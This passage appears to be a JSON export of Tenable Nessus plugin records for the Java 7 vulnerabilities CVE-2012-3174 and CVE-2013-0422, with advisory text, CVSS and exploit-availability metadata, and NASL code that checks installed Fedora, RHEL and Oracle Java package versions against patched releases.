get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:31:33", "description": "This update fixes rhbz#895035 , which consists of a set of flaws that potentially allow arbitrary code execution (including remotely via applets).\n\nIt is strongly recommended that all Java users in Fedora immediately update to this release.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0888.NASL", "href": "https://www.tenable.com/plugins/nessus/63586", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0888.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63586);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"FEDORA\", value:\"2013-0888\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Fedora 16 : java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16 (2013-0888)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes rhbz#895035 , which consists of a set of flaws that\npotentially allow arbitrary code execution (including remotely via\napplets).\n\nIt is strongly recommended that all Java users in Fedora immediately\nupdate to this release.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=895035\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/096995.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df90b29d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected java-1.7.0-openjdk package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:34:11", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is earlier than 7 Update 11 and is, therefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass' method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client deployments of Java only and can only be exploited through untrusted 'Java Web Start' applications and untrusted Java applets.", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "nessus", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "href": "https://www.tenable.com/plugins/nessus/64840", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64840);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities (Unix)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains a programming platform that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jre\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sun_java_jre_installed_unix.nasl\");\n script_require_keys(\"Host/Java/JRE/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Check each installed JRE.\ninstalls = get_kb_list_or_exit(\"Host/Java/JRE/Unmanaged/*\");\n\ninfo = \"\";\nvuln = 0;\nvuln2 = 0;\ninstalled_versions = \"\";\ngranular = \"\";\nforeach install (list_uniq(keys(installs)))\n{\n ver = install - \"Host/Java/JRE/Unmanaged/\";\n if (ver !~ \"^[0-9.]+\") continue;\n\n installed_versions = installed_versions + \" & \" + ver;\n\n if (ver =~ '^1\\\\.7\\\\.0_(0[0-9]|10)([^0-9]|$)')\n {\n dirs = make_list(get_kb_list(install));\n vuln += max_index(dirs);\n\n foreach dir (dirs)\n info += '\\n Path : ' + dir;\n\n info += '\\n Installed version : ' + ver;\n info += '\\n Fixed version : 1.7.0_11\\n';\n }\n else if (ver =~ \"^[\\d\\.]+$\")\n {\n dirs = make_list(get_kb_list(install));\n foreach dir (dirs)\n granular += \"The Oracle Java version \"+ver+\" at \"+dir+\" is not granular enough to make a determination.\"+'\\n';\n }\n else\n {\n dirs = make_list(get_kb_list(install));\n vuln2 += max_index(dirs);\n }\n\n}\n\n# Report if any were found to be vulnerable.\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Java are\";\n else s = \" of Java is\";\n\n report =\n '\\n' +\n 'The following vulnerable instance'+s+' installed on the\\n' +\n 'remote host :\\n' +\n info;\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n if (granular) exit(0, granular);\n}\nelse\n{\n if (granular) exit(0, granular);\n installed_versions = substr(installed_versions, 3);\n if (vuln2 > 1)\n exit(0, \"The Java \"+installed_versions+\" installs on the remote host are not affected.\");\n else\n exit(0, \"The Java \"+installed_versions+\" install on the remote host is not affected.\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:04", "description": "Updated java-1.7.0-openjdk packages that fix two security issues are now available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection API in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further information.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.", "cvss3": {}, "published": "2013-01-17T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.3", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo"], "id": "REDHAT-RHSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/63590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0165. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63590);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\");\n # http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.4/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?646d4ea1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2013:0165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2012-3174\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2013-0422\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0165\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:03", "description": "The version of Oracle (formerly Sun) Java SE or Java for Business installed on the remote host is earlier than 7 Update 11 and is, therefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass' method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client deployments of Java only and can only be exploited through untrusted 'Java Web Start' applications and untrusted Java applets.", "cvss3": {}, "published": "2013-01-14T00:00:00", "type": "nessus", "title": "Oracle Java SE 7 < Update 11 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/a:oracle:jre", "cpe:/a:oracle:jdk"], "id": "ORACLE_JAVA7_UPDATE11.NASL", "href": "https://www.tenable.com/plugins/nessus/63521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63521);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"CERT\", value:\"625617\");\n script_xref(name:\"EDB-ID\", value:\"24045\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"Oracle Java SE 7 < Update 11 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a programming platform that is\npotentially affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle (formerly Sun) Java SE or Java for Business\ninstalled on the remote host is earlier than 7 Update 11 and is,\ntherefore, potentially affected by the following security issues :\n\n - An unspecified issue exists in the Libraries\n component. (CVE-2012-3174)\n\n - An error exists in the 'MBeanInstantiator.findClass'\n method that could allow remote, arbitrary code execution.\n (CVE-2013-0422)\n\nNote that, according the advisory, these issues apply to client\ndeployments of Java only and can only be exploited through untrusted\n'Java Web Start' applications and untrusted Java applets.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-002/\");\n # http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eaf95a3d\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to JDK / JRE 7 Update 11 or later and, if necessary, remove any\naffected versions.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0422\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n 